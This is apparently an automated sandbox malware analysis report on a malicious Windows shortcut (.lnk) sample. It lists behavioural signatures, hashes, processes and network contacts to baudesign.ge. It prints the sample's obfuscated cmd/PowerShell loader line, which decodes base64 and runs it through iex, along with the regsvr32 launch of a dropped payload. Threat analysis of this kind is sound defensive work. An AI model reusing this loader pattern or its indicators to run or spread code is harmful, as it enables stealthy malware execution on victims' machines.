Malware Analysis Report

2024-12-07 16:17

Sample ID: 241113-nz9y4a1jdv
Target:    013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24
SHA256:    013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24
Tags:      execution
Score:     8/10

Analysis Overview

Score:        8/10
SHA256:       013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24
Threat Level: Likely malicious

The file 013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported: 2024-11-13 11:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted:        2024-11-13 11:51
Reported:         2024-11-13 11:53
Platform:         win7-20240903-en
Max time kernel:  121s
Max time network: 122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

Signatures

Command and Scripting Interpreter: PowerShell

Tag: execution

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description  Indicator  Process                       Target
N/A          N/A        C:\Windows\system32\cmd.exe   N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='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';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='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';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

Network

N/A

Files

memory/2792-40-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp
memory/2792-41-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2792-42-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2792-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-46-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-48-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-47-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted:        2024-11-13 11:51
Reported:         2024-11-13 11:53
Platform:         win10v2004-20241007-en
Max time kernel:  149s
Max time network: 151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

Signatures

Blocklisted process makes network request

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Checks computer location settings

Description        Indicator                                                                                              Process                      Target
Key value queried  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation  C:\Windows\system32\cmd.exe  N/A

Command and Scripting Interpreter: PowerShell

Tag: execution

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description  Indicator  Process                       Target
N/A          N/A        C:\Windows\system32\cmd.exe   N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='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';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='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';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"

C:\Windows\system32\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IRqRB\iKFsqCCszk.HpU

Network

Country  Destination          Domain                         Proto
US       8.8.8.8:53           241.150.49.20.in-addr.arpa     udp
US       8.8.8.8:53           baudesign.ge                   udp
GE       45.138.44.231:80     baudesign.ge                   tcp
GE       45.138.44.231:443    baudesign.ge                   tcp
US       8.8.8.8:53           138.32.126.40.in-addr.arpa     udp
US       8.8.8.8:53           231.44.138.45.in-addr.arpa     udp
US       8.8.8.8:53           95.221.229.192.in-addr.arpa    udp
US       8.8.8.8:53           13.86.106.20.in-addr.arpa      udp
US       8.8.8.8:53           212.20.149.52.in-addr.arpa     udp
US       8.8.8.8:53           18.31.95.13.in-addr.arpa       udp
US       8.8.8.8:53           75.117.19.2.in-addr.arpa       udp
US       8.8.8.8:53           172.210.232.199.in-addr.arpa   udp
US       8.8.8.8:53           14.227.111.52.in-addr.arpa     udp

Files

memory/5032-0-0x00007FFF34EC3000-0x00007FFF34EC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbn0weny.32b.ps1
  MD5:    d17fe0a3f47be24a6453e9ef58c94641
  SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5032-1-0x00000234B7A40000-0x00000234B7A62000-memory.dmp
memory/5032-11-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp
memory/5032-12-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp

C:\Users\Admin\AppData\Local\IRqRB\iKFsqCCszk.HpU
  MD5:    66aa173a8aff58102540c8f7e4b3bd07
  SHA1:   6731120f0a7523f530303ba6cbd18e016f740789
  SHA256: 36c850f3cc750f3a0dcbb1fe6e8c278529e9ec59628893c5cbb1836508dbf329
  SHA512: e810c657473e2dad9bb6c04714a37f6f7c34d4243b8006441841947efcff9c31b0511b80bed6f6211d1f23a2f4bf1b0984624c33911d31802eb37dd1771e6ff3

memory/5032-17-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp